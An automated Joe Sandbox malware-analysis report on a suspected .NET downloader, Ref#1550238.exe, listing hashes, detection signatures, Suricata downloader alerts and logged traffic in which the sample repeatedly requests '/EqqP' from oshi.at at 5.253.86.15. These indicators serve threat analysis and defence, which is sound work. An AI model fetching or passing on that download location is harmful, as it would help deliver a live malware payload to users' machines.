Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#1550238.exe

Overview

General Information

Sample name:Ref#1550238.exe
Analysis ID:1567423
MD5:a31bcf203bb60f13de83211ac9d44d06
SHA1:8d559c68b94f38e6886f467080cbce53a2ae1654
SHA256:bd35a1c3b410026617e27fa3937f77f1a42ada6978afc36022e75c63677f897d
Tags:exeuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64
  • Ref#1550238.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Ref#1550238.exe" MD5: A31BCF203BB60F13DE83211AC9D44D06)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-03T15:10:03.156977+010028033053Unknown Traffic192.168.2.7498965.253.86.15443TCP
2024-12-03T15:10:08.451556+010028033053Unknown Traffic192.168.2.7499275.253.86.15443TCP
2024-12-03T15:10:20.407125+010028033053Unknown Traffic192.168.2.7499385.253.86.15443TCP
2024-12-03T15:10:28.874317+010028033053Unknown Traffic192.168.2.7499655.253.86.15443TCP
2024-12-03T15:10:48.327359+010028033053Unknown Traffic192.168.2.7499835.253.86.15443TCP
2024-12-03T15:10:59.577294+010028033053Unknown Traffic192.168.2.7499855.253.86.15443TCP
2024-12-03T15:11:15.124157+010028033053Unknown Traffic192.168.2.7499865.253.86.15443TCP
2024-12-03T15:11:35.999128+010028033053Unknown Traffic192.168.2.7499895.253.86.15443TCP
2024-12-03T15:11:53.124045+010028033053Unknown Traffic192.168.2.7499905.253.86.15443TCP
2024-12-03T15:12:08.833318+010028033053Unknown Traffic192.168.2.7499935.253.86.15443TCP
2024-12-03T15:12:13.530479+010028033053Unknown Traffic192.168.2.7499945.253.86.15443TCP
2024-12-03T15:12:24.397233+010028033053Unknown Traffic192.168.2.7499955.253.86.15443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Ref#1550238.exeReversingLabs: Detection: 44%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: Ref#1550238.exeJoe Sandbox ML: detected
Source: Ref#1550238.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49938 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49965 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49985 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49986 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49987 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49988 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49989 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49990 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49991 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49992 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49993 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49995 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49996 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49997 version: TLS 1.2
Source: Ref#1550238.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: Joe Sandbox ViewIP Address: 5.253.86.15 5.253.86.15
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49896 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49995 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49986 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49985 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49994 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49989 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49938 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49965 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49983 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49993 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49990 -> 5.253.86.15:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49927 -> 5.253.86.15:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficHTTP traffic detected: GET /EqqP HTTP/1.1Host: oshi.at
Source: global trafficDNS traffic detected: DNS query: oshi.at
Source: Ref#1550238.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: Ref#1550238.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: Ref#1550238.exe, 00000000.00000002.3743212803.0000000006E6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: Ref#1550238.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: Ref#1550238.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: Ref#1550238.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: Ref#1550238.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: Ref#1550238.exeString found in binary or memory: http://ocsps.ssl.com0
Source: Ref#1550238.exeString found in binary or memory: http://ocsps.ssl.com0?
Source: Ref#1550238.exeString found in binary or memory: http://ocsps.ssl.com0_
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.at
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.atd
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ref#1550238.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: Ref#1550238.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/EqqP
Source: Ref#1550238.exe, 00000000.00000002.3741808265.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.atD
Source: Ref#1550238.exeString found in binary or memory: https://www.ssl.com/repository0
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49938 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49965 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49985 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49986 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49987 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49988 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49989 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49990 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49991 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49992 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49993 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49995 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49996 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49997 version: TLS 1.2
Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_0164DA1C0_2_0164DA1C
Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_056FAAF80_2_056FAAF8
Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_056F05680_2_056F0568
Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_056F05580_2_056F0558
Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_056FC5500_2_056FC550
Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_056FC9C80_2_056FC9C8
Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_056FC9B80_2_056FC9B8
Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_056FAAE80_2_056FAAE8
Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_056FAA830_2_056FAA83
Source: Ref#1550238.exeStatic PE information: invalid certificate
Source: Ref#1550238.exe, 00000000.00000000.1286681409.0000000000E22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
Source: Ref#1550238.exe, 00000000.00000002.3741306291.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#1550238.exe
Source: Ref#1550238.exeBinary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
Source: Ref#1550238.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal56.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\Ref#1550238.exeMutant created: NULL
Source: Ref#1550238.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Ref#1550238.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Ref#1550238.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Ref#1550238.exeReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: gpapi.dllJump to behavior
Source: Ref#1550238.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Ref#1550238.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Ref#1550238.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
